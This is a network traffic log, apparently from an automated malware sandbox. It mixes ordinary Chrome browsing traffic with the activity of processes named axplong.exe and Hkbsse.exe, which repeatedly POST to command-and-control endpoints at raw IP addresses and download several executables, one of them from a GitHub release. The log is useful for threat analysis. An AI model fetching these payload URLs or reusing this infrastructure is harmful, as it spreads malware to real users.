referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKk_9VRCGbnDpXfstSfcSHKtOdOZVws2joTzO-nIRF&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcTKk_9VRCGbnDpXfstSfcSHKtOdOZVws2joTzO-nIRF&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRBo1KzsA9GzSrz7aKmRLEa5g9kwJkCg12cfgghh1WV&s=10

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /images?q=tbn:ANd9GcRBo1KzsA9GzSrz7aKmRLEa5g9kwJkCg12cfgghh1WV&s=10 HTTP/2.0
host: encrypted-tbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

14.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.178.250.142.in-addr.arpa

IN PTR

Response

14.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f141e100net
DNS

lh5.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

lh5.googleusercontent.com

IN A

Response

lh5.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

172.217.16.225
DNS

225.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.16.217.172.in-addr.arpa

IN PTR

Response

225.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f11e100net

225.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f1�H
DNS

id.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

id.google.com

IN A

Response

id.google.com

IN A

216.58.212.195
GET

https://id.google.com/verify/ABDN9Yfh25vEGS0u0er7iKrsWkEKpTnNxserPK4lSdiUqBbP-APZl3gX_UhNmbq0WCDiW3oGHyORs4M7jXd7oQ1QD4ze8o-aw4tzMKQkCLbI-EkT

chrome.exe

Remote address:

216.58.212.195:443

Request

GET /verify/ABDN9Yfh25vEGS0u0er7iKrsWkEKpTnNxserPK4lSdiUqBbP-APZl3gX_UhNmbq0WCDiW3oGHyORs4M7jXd7oQ1QD4ze8o-aw4tzMKQkCLbI-EkT HTTP/2.0
host: id.google.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: AEC=AQTF6HyhayuSj5rVCgN50Zjp-ciAZ3vabiplENEoW5qi504-D0MQeub6WaI
cookie: SOCS=CAISHAgCEhJnd3NfMjAyNDA2MjUtMF9SQzUaAmVuIAEaBgiA1_KzBg
cookie: NID=515=uqg5Tj6mmu6A-PjRKtJhEU7SNaqSczu--QHA3xp7jtpWPnoptsrbS_voRWNzgrBGn7i166TcJf-9AcxDbv9r4tGkEOl4P4fE1ab7osM7eoZz5rUqgYcs0lBJifaeseVggYrmlxuzH58Z8z5xc5ukf8yznUsJ5VZiXXaIIw4cMON05DoNg28582WqakXzasWWDW4
DNS

195.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.212.58.216.in-addr.arpa

IN PTR

Response

195.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f31e100net

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f195�H

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f3�H
DNS

i.ytimg.com

chrome.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.250.179.246

i.ytimg.com

IN A

142.250.200.22

i.ytimg.com

IN A

142.250.200.54

i.ytimg.com

IN A

216.58.204.86

i.ytimg.com

IN A

216.58.213.22

i.ytimg.com

IN A

142.250.187.214

i.ytimg.com

IN A

172.217.16.246

i.ytimg.com

IN A

172.217.169.22

i.ytimg.com

IN A

142.250.178.22

i.ytimg.com

IN A

216.58.201.118

i.ytimg.com

IN A

142.250.180.22

i.ytimg.com

IN A

172.217.169.54

i.ytimg.com

IN A

142.250.187.246
GET

https://i.ytimg.com/vi/pNX3_MZed8A/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3mfjYkq9P4taN4EDeO7SujWK8oe4A

chrome.exe

Remote address:

142.250.179.246:443

Request

GET /vi/pNX3_MZed8A/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3mfjYkq9P4taN4EDeO7SujWK8oe4A HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://i.ytimg.com/vi/2inz3nL6GDQ/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3nDiFhrj1yMwzYMragtHNiFjUG3dw

chrome.exe

Remote address:

142.250.179.246:443

Request

GET /vi/2inz3nL6GDQ/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3nDiFhrj1yMwzYMragtHNiFjUG3dw HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://i.ytimg.com/vi/VvC_A7NcyLM/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3nGJmN4OWBZDaTCX3NJtoT8kIDZ7Q

chrome.exe

Remote address:

142.250.179.246:443

Request

GET /vi/VvC_A7NcyLM/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3nGJmN4OWBZDaTCX3NJtoT8kIDZ7Q HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://i.ytimg.com/vi/UFPXh8h4eFM/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3k1Pnn139-UZa4_Eo83Csr1nGGMgQ

chrome.exe

Remote address:

142.250.179.246:443

Request

GET /vi/UFPXh8h4eFM/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3k1Pnn139-UZa4_Eo83Csr1nGGMgQ HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

www.youtube.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

172.217.16.238
GET

https://www.youtube.com/iframe_api?version=3

chrome.exe

Remote address:

216.58.204.78:443

Request

GET /iframe_api?version=3 HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

246.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

246.179.250.142.in-addr.arpa

IN PTR

Response

246.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f221e100net
DNS

246.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

246.179.250.142.in-addr.arpa

IN PTR
DNS

googleads.g.doubleclick.net

chrome.exe

Remote address:

8.8.8.8:53

Request

googleads.g.doubleclick.net

IN A

Response

googleads.g.doubleclick.net

IN A

172.217.16.226
DNS

static.doubleclick.net

chrome.exe

Remote address:

8.8.8.8:53

Request

static.doubleclick.net

IN A

Response

static.doubleclick.net

IN A

172.217.169.6
DNS

jnn-pa.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

jnn-pa.googleapis.com

IN A

Response

jnn-pa.googleapis.com

IN A

142.250.179.234

jnn-pa.googleapis.com

IN A

172.217.169.10

jnn-pa.googleapis.com

IN A

216.58.201.106

jnn-pa.googleapis.com

IN A

142.250.200.10

jnn-pa.googleapis.com

IN A

142.250.200.42

jnn-pa.googleapis.com

IN A

142.250.187.202

jnn-pa.googleapis.com

IN A

142.250.187.234

jnn-pa.googleapis.com

IN A

216.58.204.74

jnn-pa.googleapis.com

IN A

172.217.16.234

jnn-pa.googleapis.com

IN A

216.58.212.202

jnn-pa.googleapis.com

IN A

216.58.212.234

jnn-pa.googleapis.com

IN A

142.250.180.10

jnn-pa.googleapis.com

IN A

142.250.178.10
GET

https://googleads.g.doubleclick.net/pagead/id

chrome.exe

Remote address:

172.217.16.226:443

Request

GET /pagead/id HTTP/2.0
host: googleads.g.doubleclick.net
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.youtube.com
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://googleads.g.doubleclick.net/pagead/id?slf_rd=1

chrome.exe

Remote address:

172.217.16.226:443

Request

GET /pagead/id?slf_rd=1 HTTP/2.0
host: googleads.g.doubleclick.net
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.youtube.com
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://static.doubleclick.net/instream/ad_status.js

chrome.exe

Remote address:

172.217.169.6:443

Request

GET /instream/ad_status.js HTTP/2.0
host: static.doubleclick.net
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

226.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

226.16.217.172.in-addr.arpa

IN PTR

Response

226.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f21e100net

226.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f2�H
DNS

6.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.169.217.172.in-addr.arpa

IN PTR

Response

6.169.217.172.in-addr.arpa

IN PTR

lhr25s26-in-f61e100net
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:11:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 500 Internal Server Error

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:11:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

encrypted-vtbn0.gstatic.com

chrome.exe

Remote address:

8.8.8.8:53

Request

encrypted-vtbn0.gstatic.com

IN A

Response

encrypted-vtbn0.gstatic.com

IN A

142.250.180.14
GET

https://encrypted-vtbn0.gstatic.com/video?q=tbn:ANd9GcSff5k1FQu0R23-DvYPtyT_xeW2Bb8BqsQEZg

chrome.exe

Remote address:

142.250.180.14:443

Request

GET /video?q=tbn:ANd9GcSff5k1FQu0R23-DvYPtyT_xeW2Bb8BqsQEZg HTTP/2.0
host: encrypted-vtbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.google.com/
accept-language: en-US,en;q=0.9
range: bytes=0-
GET

https://encrypted-vtbn0.gstatic.com/video?q=tbn:ANd9GcQ6nwWCznkKWeqK4ubzg7Wq80AUiPKjW796EQ

chrome.exe

Remote address:

142.250.180.14:443

Request

GET /video?q=tbn:ANd9GcQ6nwWCznkKWeqK4ubzg7Wq80AUiPKjW796EQ HTTP/2.0
host: encrypted-vtbn0.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.google.com/
accept-language: en-US,en;q=0.9
range: bytes=0-
DNS

14.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.180.250.142.in-addr.arpa

IN PTR

Response

14.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f141e100net
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

beacons.gcp.gvt2.com

chrome.exe

Remote address:

8.8.8.8:53

Request

beacons.gcp.gvt2.com

IN A

Response

beacons.gcp.gvt2.com

IN CNAME

beacons-handoff.gcp.gvt2.com

beacons-handoff.gcp.gvt2.com

IN A

172.217.169.67
POST

https://beacons.gcp.gvt2.com/domainreliability/upload

chrome.exe

Remote address:

172.217.169.67:443

Request

POST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 11259
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

67.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.169.217.172.in-addr.arpa

IN PTR

Response

67.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f31e100net
DNS

encrypted-tbn1.gstatic.com

chrome.exe

Remote address:

8.8.8.8:53

Request

encrypted-tbn1.gstatic.com

IN A

Response

encrypted-tbn1.gstatic.com

IN A

142.250.178.14
DNS

encrypted-tbn2.gstatic.com

chrome.exe

Remote address:

8.8.8.8:53

Request

encrypted-tbn2.gstatic.com

IN A

Response

encrypted-tbn2.gstatic.com

IN A

142.250.180.14
GET

https://encrypted-tbn1.gstatic.com/faviconV2?url=https://www.instagram.com&client=IMAGE_SEARCH&size=24&type=FAVICON&fallback_opts=TYPE,SIZE,URL

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /faviconV2?url=https://www.instagram.com&client=IMAGE_SEARCH&size=24&type=FAVICON&fallback_opts=TYPE,SIZE,URL HTTP/2.0
host: encrypted-tbn1.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://encrypted-tbn2.gstatic.com/faviconV2?url=https://www.reddit.com&client=IMAGE_SEARCH&size=24&type=FAVICON&fallback_opts=TYPE,SIZE,URL

chrome.exe

Remote address:

142.250.180.14:443

Request

GET /faviconV2?url=https://www.reddit.com&client=IMAGE_SEARCH&size=24&type=FAVICON&fallback_opts=TYPE,SIZE,URL HTTP/2.0
host: encrypted-tbn2.gstatic.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJnuygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

13.107.21.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

tls, http2

2.5kB
9.0kB
19
15

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

HTTP Response

204
23.62.61.129:443

https://www.bing.com/aes/c.gif?RG=ede788dc18cc464a8f2c10d22be5f927&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T192913Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373

tls, http2

1.4kB
5.3kB
16
13

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=ede788dc18cc464a8f2c10d22be5f927&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T192913Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373

HTTP Response

200
23.62.61.129:443

https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90

tls, http2

1.8kB
11.2kB
21
18

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90

HTTP Response

200
77.91.77.81:80

http://77.91.77.81/Kiru9gu/index.php

http

axplong.exe

107.6kB
2.7MB
1975
1960

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/gold.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/alex5555555.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/123.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200
185.172.128.116:80

http://185.172.128.116/NewLatest.exe

http

axplong.exe

15.4kB
438.5kB
333
332

HTTP Request

GET http://185.172.128.116/NewLatest.exe

HTTP Response

200
4.184.236.127:1110

RegAsm.exe

260 B
5
20.26.156.215:443

https://github.com/frielandrews892/File/releases/download/installer/Installer.exe

tls, http

axplong.exe

1.2kB
8.0kB
17
12

HTTP Request

GET https://github.com/frielandrews892/File/releases/download/installer/Installer.exe

HTTP Response

302
185.199.108.133:443

https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140731Z&X-Amz-Expires=300&X-Amz-Signature=015e1618dfceb5f5bc7fefa9af04c8fbf3deb464ffd837da1edb09b3be780567&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream

tls, http

axplong.exe

6.9kB
170.0kB
131
130

HTTP Request

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140731Z&X-Amz-Expires=300&X-Amz-Signature=015e1618dfceb5f5bc7fefa9af04c8fbf3deb464ffd837da1edb09b3be780567&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream

HTTP Response

200
185.172.128.116:80

http://185.172.128.116/Mb3GvQs8/index.php

http

Hkbsse.exe

100.7kB
2.7MB
2063
2058

HTTP Request

POST http://185.172.128.116/Mb3GvQs8/index.php

HTTP Response

200

HTTP Request

POST http://185.172.128.116/Mb3GvQs8/index.php

HTTP Response

200

HTTP Request

GET http://185.172.128.116/FirstZ.exe

HTTP Response

200

HTTP Request

